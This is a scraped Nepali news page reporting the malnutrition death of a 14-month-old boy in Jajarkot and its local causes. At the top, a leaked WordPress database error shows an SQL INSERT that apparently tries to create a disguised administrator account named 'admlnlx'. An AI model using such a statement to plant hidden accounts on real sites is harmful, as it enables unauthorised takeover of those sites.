WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B5EVDtLeX44sHqlcCZq50I67X78mur1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2025-12-29 02:38:55', '', 'admlnlx', 'admlnlx')
जाजरकोट, फागुन ५ –
कुपोषणका कारण जाजरकोटमा एक बालकको ज्यान गएको छ । पजारु–९ का १४ महिनाका अनेगत नेपालीको कुपोषणका कारण बुधबार ज्यान गएको पजारु स्वास्थ्य चौकीका अहेब प्रेमबहादुर शाहीले बताउनुभयो ।
बालकको तौल जम्मा पाँच किलो थियो । हिरा नेपाली र कर्णबहादुर नेपालीका पहिलो सन्तान अनेगतको उपचारका लागि रकम जुटाउने क्रम चलिरहेको थियो । रकम जुटाएर सदरमुकाम खलंगा लैजाने तयारी गरिरहेका बेला बालकको ज्यान गएको हो ।
कुपोषणका कारण बिरामी भएका बालकलाई धामी, झाँक्रीलाई देखाउँदा समयमा उपचार हुन सकेको थिएन । जाजरकोटमा कम उमेरमा हुने विवाह र कम उमेरमै बच्चा जन्मिने, उचित आहारविहारको कमी लगायतले बालबालिकामा कुपोषणको समस्या देखिने गरेको छ ।